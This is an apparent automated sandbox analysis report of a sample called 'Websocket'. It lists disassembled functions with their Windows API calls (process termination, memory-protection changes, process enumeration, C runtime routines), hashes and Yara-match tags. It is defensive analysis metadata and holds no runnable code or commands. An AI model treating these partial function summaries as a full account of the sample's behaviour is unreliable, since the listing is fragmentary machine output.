                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: :3K0$K<n($.v
                                    • API String ID: 2050909247-921737329
                                    • Opcode ID: 94817a47e41d01ae37784d4ed2cbfd74142b139b727af1155e30eb641aacb6ec
                                    • Instruction ID: 8272825aed6bc52d32ed7dc49c5e82ae1b20fe52be17daf51d008efc4e28bb70
                                    • Opcode Fuzzy Hash: 94817a47e41d01ae37784d4ed2cbfd74142b139b727af1155e30eb641aacb6ec
                                    • Instruction Fuzzy Hash: 7DB1A270B043104BDB54DFB49951AEA77A7AFC8B40F1C881EF446CB391DA34DD858BA6
                                    Function 0040E720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47processCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    Function 00413801 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    Function 00412B32 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    Function 00412DE4 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    Function 00414EB0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(02321660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    Function 00413191 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    Function 00415631 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    Function 0040F697 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    Function 0040E170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
                                    Function 0040F6B9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    Function 0040E6A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
                                    Function 007321A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 007321F9
                                    • SetLastError.KERNEL32(0000007E), ref: 0073223B
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 38b4f50d5fc10cb5cf5488caa4200bac3a0dcd409198d406b8535ebfa175ea2f
                                    • Instruction ID: 8a65c80facea493eda22a1f3806653ec6818a494a89910ec35f3fc8e1c731892
                                    • Opcode Fuzzy Hash: 38b4f50d5fc10cb5cf5488caa4200bac3a0dcd409198d406b8535ebfa175ea2f
                                    • Instruction Fuzzy Hash: 8E819B74A00209EFDB04DF94C994BAEB7B1FF48314F248158E959AB356D738AE81CF91
                                    Function 0041586A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    Function 00416787 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    Function 0061A4B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 254COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 0061A787
                                    • ProcessIdToSessionId.KERNEL32(00000000), ref: 0061A78A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentSession
                                    • String ID: .v
                                    • API String ID: 2701954971-2572790428
                                    • Opcode ID: 8f6147540655c5dcc8c1a0b7c3254943866f873b70ec0a541b892e1615da10e4
                                    • Instruction ID: 80ab9f63d68ca92badbdb68c855c1022b89936878b5d7901f3d29ebf53d8ac01
                                    • Opcode Fuzzy Hash: 8f6147540655c5dcc8c1a0b7c3254943866f873b70ec0a541b892e1615da10e4
                                    • Instruction Fuzzy Hash: 3E81A231B053008BDB64EFA4A8426FA72E7AFC4754B0C442EF845CB364EA34CD858793
                                    Function 00732430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00732468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 007324B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: 0b8acc029a2bf3115f6b01db21965f6733331665869268050a3c1f15ed0e78ac
                                    • Instruction ID: 5b5cd7114a10b83a89c8f63896335bb05dae223936752c69ec01c15552396c84
                                    • Opcode Fuzzy Hash: 0b8acc029a2bf3115f6b01db21965f6733331665869268050a3c1f15ed0e78ac
                                    • Instruction Fuzzy Hash: 5421E5B0A00249EFEF14CF98C980BADBBB5BF44304F208199D905AB242D778AF81DB55
                                    Function 00412F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
